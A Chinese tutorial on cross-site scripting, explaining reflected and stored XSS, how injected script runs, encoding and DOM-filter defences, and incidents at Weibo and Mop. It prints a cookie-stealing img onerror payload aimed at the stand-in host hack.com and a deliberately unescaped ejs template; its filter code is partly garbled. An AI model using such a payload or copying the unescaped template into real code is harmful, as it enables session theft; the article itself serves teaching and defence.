Web安全之跨站脚本攻击(XSS)

本文涉及的产品
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
全局流量管理 GTM,标准版 1个月
云解析 DNS,旗舰版 1个月
简介:

什么是XSS

跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

XSS的攻击场景

  • 反射型这类攻击方式主要借助URL来实施。URL的构成分为协议、域名、端口、路径、查询几部分构成。如图所示:

  • XSS往往在“查询”部分发现漏洞构造攻击代码实施攻击,所谓“反射”可以理解为hacker并不会直接攻击客户,而是通过URL植入代码通过服务器获取并植入到用户页面完成攻击。攻击流程图如下:

  • 存储型存储型攻击方式和反射型最大的区别就是不通过URL来传播,而是利用站点本身合法的存储结构,比如评论。任何用户都可以通过站点提供的接口提交评论内容,这些评论内容都被存储到服务器的数据库。当用户访问这些评论的时候,服务器从数据库提取内容插入到页面反馈给用户。如果评论内容本身是具备攻击性内容,用户无一幸免。攻击流程图如下:

从上下两个流程图来看,反射型和存储型的攻击方式是本质不同的,前者需要借助各种社交渠道传播具备攻击的URL来实施,后者通过网站本身的存储漏洞,攻击成本低很多,而且伤害力更大。

XSS的工作原理

不管是反射型还是存储型,服务端都会将JavaScript当做文本处理,这些文本在服务端被整合进html文档中,在浏览器解析这些文本的过程也就是XSS被执行的时候。

从攻击到执行分为以下几步:

  1. 构造攻击代码
  2. 服务端提取并写入HTML
  3. 浏览器解析,XSS执行

构造攻击代码

hacker在发现站点对应的漏洞之后,基本可以确定是使用“反射型”或者“存储型”。对于反射型这个很简单了,执行类似代码:


 
 
  1. https://www.toutiao.com/search?item=<img onerror="new Image().src='//hack.com?c=' src='null'>" 

大家知道很多站点都提供搜索服务,这里的item字段就是给服务端提供关键词。如果hacker将关键词修改成可执行的JavaScript语句,如果服务端不加处理直接将类似代码回显到页面,XSS代码就会被执行。

这段代码的含义是告诉浏览器加载一张图片,图片的地址是空,根据加载机制空图片的加载会触发Element的onerror事件,这段代码的onerror事件是将本地cookie传到指定的网站。

很明显,hacker可以拿到“中招”用户的cookie,利用这个身份就可以拿到很多隐私信息和做一些不当的行为了。

对于存储型直接通过读取数据库将内容打到接口上就可以了。

服务端提取并写入HTML

我们以 Node.js 应用型框架express.js为例:

服务端代码(express.js)


 
 
  1. router.get('/'function (req, res, next) {   
  2.  
  3.     res.render('index', { 
  4.  
  5.         title: 'Express'
  6.  
  7.         search: req.query.item 
  8.  
  9.     }); 
  10.  
  11. });  

ejs模板


 
 
  1. <p> 
  2.  
  3. <%- search %> 
  4.  
  5. </p>  

这里列举了以反射型为主的服务端代码,通过获取URL的查询res.query.item,最后在模板中输出内容。对于存储型的区别是通过数据库拿到对应内容,模板部分一致。

浏览器解析,XSS执行

从这个图上来看浏览器解析主要做三件事:

  • 将文档解析成DOM Tree
  • 解析CSS成规则树
  • Javascript解析

在这个过程,XSS的代码从文本变的可执行。

XSS的防范措施

编码

对于反射型的代码,服务端代码要对查询进行编码,主要目的就是将查询文本化,避免在浏览器解析阶段转换成DOM和CSS规则及JavaScript解析。

常见的HTML实体编码如下:

除了编码和解码,还需要做额外的共奏来解决富文本内容的XSS攻击。

我们知道很多场景是允许用户输入富文本,而且也需要将富文本还原。这个时候就是hacker容易利用的点进行XSS攻击。

DOM Parse和过滤

从XSS工作的原理可知,在服务端进行编码,在模板解码这个过程对于富文本的内容来说,完全可以被浏览器解析到并执行,进而给了XSS执行的可乘之机。

为了杜绝悲剧发生,我们需要在浏览器解析之后进行解码,得到的文本进行DOM parse拿到DOM Tree,对所有的不安全因素进行过滤,最后将内容交给浏览器,达到避免XSS感染的效果。

具体原理如下:

  • 解码

 
 
  1. var unescape = function(html, options) { 
  2.  
  3.             options = merge(options, decode.options); 
  4.  
  5.             var strict = options.strict; 
  6.  
  7.             if (strict && regexInvalidEntity.test(html)) { 
  8.  
  9.                 parseError('malformed character reference'); 
  10.  
  11.             } 
  12.  
  13.             return html.replace(regexDecode, function($0, $1, $2, $3, $4, $5, $6, $7) { 
  14.  
  15.                 var codePoint; 
  16.  
  17.                 var semicolon; 
  18.  
  19.                 var decDigits; 
  20.  
  21.                 var hexDigits; 
  22.  
  23.                 var reference; 
  24.  
  25.                 var next
  26.  
  27.                 if ($1) { 
  28.  
  29.                     // Decode decimal escapes, e.g. ``. 
  30.  
  31.                     decDigits = $1; 
  32.  
  33.                     semicolon = $2; 
  34.  
  35.                     if (strict && !semicolon) { 
  36.  
  37.                         parseError('character reference was not terminated by a semicolon'); 
  38.  
  39.                     } 
  40.  
  41.                     codePoint = parseInt(decDigits, 10); 
  42.  
  43.                     return codePointToSymbol(codePoint, strict); 
  44.  
  45.                 } 
  46.  
  47.                 if ($3) { 
  48.  
  49.                     // Decode hexadecimal escapes, e.g. ``. 
  50.  
  51.                     hexDigits = $3; 
  52.  
  53.                     semicolon = $4; 
  54.  
  55.                     if (strict && !semicolon) { 
  56.  
  57.                         parseError('character reference was not terminated by a semicolon'); 
  58.  
  59.                     } 
  60.  
  61.                     codePoint = parseInt(hexDigits, 16); 
  62.  
  63.                     return codePointToSymbol(codePoint, strict); 
  64.  
  65.                 } 
  66.  
  67.                 if ($5) { 
  68.  
  69.                     // Decode named character references with trailing `;`, e.g. `©`. 
  70.  
  71.                     reference = $5; 
  72.  
  73.                     if (has(decodeMap, reference)) { 
  74.  
  75.                         return decodeMap[reference]; 
  76.  
  77.                     } else { 
  78.  
  79.                         // Ambiguous ampersand. https://mths.be/notes/ambiguous-ampersands 
  80.  
  81.                         if (strict) { 
  82.  
  83.                             parseError( 
  84.  
  85.                                 'named character reference was not terminated by a semicolon' 
  86.  
  87.                             ); 
  88.  
  89.                         } 
  90.  
  91.                         return $0; 
  92.  
  93.                     } 
  94.  
  95.                 } 
  96.  
  97.                 // If we’re still here, it’s a legacy reference for sure. No need for an 
  98.  
  99.                 // extra `if` check
  100.  
  101.                 // Decode named character references without trailing `;`, e.g. `&amp` 
  102.  
  103.                 // This is only a parse error if it gets converted to `&`, or if it is 
  104.  
  105.                 // followed by `=` in an attribute context. 
  106.  
  107.                 reference = $6; 
  108.  
  109.                 next = $7; 
  110.  
  111.                 if (next && options.isAttributeValue) { 
  112.  
  113.                     if (strict && next == '=') { 
  114.  
  115.                         parseError('`&` did not start a character reference'); 
  116.  
  117.                     } 
  118.  
  119.                     return $0; 
  120.  
  121.                 } else { 
  122.  
  123.                     if (strict) { 
  124.  
  125.                         parseError( 
  126.  
  127.                             'named character reference was not terminated by a semicolon' 
  128.  
  129.                         ); 
  130.  
  131.                     } 
  132.  
  133.                     // Note: there is no need to check `has(decodeMapLegacy, reference)`. 
  134.  
  135.                     return decodeMapLegacy[reference] + (next || ''); 
  136.  
  137.                 } 
  138.  
  139.             }); 
  140.  
  141.         };  
  • DOM Parse和过滤

 
 
  1. var parse=function(str){   
  2.  
  3.     var results=''
  4.  
  5.     try { 
  6.  
  7.         HTMLParser(str,{ 
  8.  
  9.             start:function(tag,attrs,unary){ 
  10.  
  11.                 if(tag=='script' || tag=='style'|| tag=='img'|| tag=='link'){ 
  12.  
  13.                     return 
  14.  
  15.                 } 
  16.  
  17.                 results+=""
  18.  
  19.             }, 
  20.  
  21.             end:function(tag){ 
  22.  
  23.                 results+=""+tag+">"
  24.  
  25.             }, 
  26.  
  27.             chars:function(text){ 
  28.  
  29.                 results+=text; 
  30.  
  31.             }, 
  32.  
  33.             comment:function(){ 
  34.  
  35.                 results+="'; 
  36.  
  37.             } 
  38.  
  39.         }) 
  40.  
  41.         return results; 
  42.  
  43.     } catch (e) { 
  44.  
  45.   
  46.  
  47.     } finally { 
  48.  
  49.   
  50.  
  51.     } 
  52.  
  53. }; 
  54.  
  55.   
  56.  
  57.     var dst=parse(str);  

在此展示了部分代码,其中DOM Parse可以采用第三方的Js库来完成。

XSS的危害

相信大家都对XSS了有一定的了解,下面列举几个XSS影响比较大的事件供参考,做到警钟长鸣。

  • 微博遭受攻击案例2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫的攻击。此事件给严重依赖社交网络的网友们敲响了警钟。在此之前,国内多家著名的SNS网站和大型博客网站都曾遭遇过类似的攻击事件,只不过没有形成如此大规模传播。虽然此次XSS蠕虫攻击事 件中,恶意黑客攻击者并没有在恶意脚本中植入挂马代码或其他窃取用户账号密码信息的脚本,但是这至少说明,病毒木马等黑色产业已经将眼光投放到这个尚存漏洞的领域。
  • 猫扑遭受攻击案例曾经在猫扑大杂烩中存在这样一个XSS漏洞,在用户发表回复的时候,程序对用户发表的内容做了严格的过滤,但是我不知道为什么,当用户编辑回复内容再次发表的时候,他却采用了另外一种不同的过滤方式,而这种过滤方式显然是不严密的,因此导致了XSS漏洞的出现。试想一下,像猫扑这样的大型社区,如果在一篇热帖中,利用XSS漏洞来使所有的浏览这篇帖子的用户都在不知不觉之中访问到了另外一个站点,如果这个站点同样是大型站点还好,但如果是中小型站点那就悲剧了,这将会引来多大的流量啊!更可怕的是,这些流量全部都是真实有效的!

如果本文有描述不准确或错误,欢迎大家指正……,不胜感激。


作者:佚名

来源:51CTO

相关文章
|
2月前
|
缓存 安全 搜索推荐
阿里云先知安全沙龙(北京站) ——浅谈Web快速打点
信息收集是网络安全中的重要环节,常用工具如Hunter、Fofa和扫描工具可帮助全面了解目标系统的网络结构与潜在漏洞。遇到默认Nginx或Tomcat 404页面时,可通过扫路径、域名模糊测试、搜索引擎缓存等手段获取更多信息。AllIN工具(GitHub: P1-Team/AllIN)能高效扫描网站路径,发现敏感信息。漏洞利用则需充分准备,以应对突发情况,确保快速拿下目标站点。 简介:信息收集与漏洞利用是网络安全的两大关键步骤。通过多种工具和技术手段,安全人员可以全面了解目标系统,发现潜在漏洞,并制定有效的防御和攻击策略。
|
3月前
|
JavaScript 安全 前端开发
同源策略如何防止 XSS 攻击?
【10月更文挑战第31天】同源策略通过对 DOM 访问、Cookie 访问、脚本执行环境和跨源网络请求等多方面的严格限制,构建了一道坚实的安全防线,有效地防止了 XSS 攻击,保护了用户在网络浏览过程中的数据安全和隐私。
130 49
|
2月前
|
安全 应用服务中间件 网络安全
实战经验分享:利用免费SSL证书构建安全可靠的Web应用
本文分享了利用免费SSL证书构建安全Web应用的实战经验,涵盖选择合适的证书颁发机构、申请与获取证书、配置Web服务器、优化安全性及实际案例。帮助开发者提升应用安全性,增强用户信任。
|
3月前
|
SQL 负载均衡 安全
安全至上:Web应用防火墙技术深度剖析与实战
【10月更文挑战第29天】在数字化时代,Web应用防火墙(WAF)成为保护Web应用免受攻击的关键技术。本文深入解析WAF的工作原理和核心组件,如Envoy和Coraza,并提供实战指南,涵盖动态加载规则、集成威胁情报、高可用性配置等内容,帮助开发者和安全专家构建更安全的Web环境。
108 1
|
3月前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
113 2
|
3月前
|
SQL 存储 安全
什么是XSS攻击?什么是SQL注入攻击?什么是CSRF攻击?
理解并防范XSS、SQL注入和CSRF攻击是Web应用安全的基础。通过采用严格的输入验证、使用安全编码实践以及实现适当的身份验证和授权机制,可以有效防止这些常见的Web攻击,保障应用程序和用户的数据安全。
65 0
|
4月前
|
XML JSON API
ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
243 3
|
3月前
|
开发框架 搜索推荐 数据可视化
Django框架适合开发哪种类型的Web应用程序?
Django 框架凭借其强大的功能、稳定性和可扩展性,几乎可以适应各种类型的 Web 应用程序开发需求。无论是简单的网站还是复杂的企业级系统,Django 都能提供可靠的支持,帮助开发者快速构建高质量的应用。同时,其活跃的社区和丰富的资源也为开发者在项目实施过程中提供了有力的保障。
151 62
|
2月前
|
前端开发 安全 JavaScript
2025年,Web3开发学习路线全指南
本文提供了一条针对Dapp应用开发的学习路线,涵盖了Web3领域的重要技术栈,如区块链基础、以太坊技术、Solidity编程、智能合约开发及安全、web3.js和ethers.js库的使用、Truffle框架等。文章首先分析了国内区块链企业的技术需求,随后详细介绍了每个技术点的学习资源和方法,旨在帮助初学者系统地掌握Dapp开发所需的知识和技能。
2025年,Web3开发学习路线全指南
|
3月前
|
设计模式 前端开发 数据库
Python Web开发:Django框架下的全栈开发实战
【10月更文挑战第27天】本文介绍了Django框架在Python Web开发中的应用,涵盖了Django与Flask等框架的比较、项目结构、模型、视图、模板和URL配置等内容,并展示了实际代码示例,帮助读者快速掌握Django全栈开发的核心技术。
258 45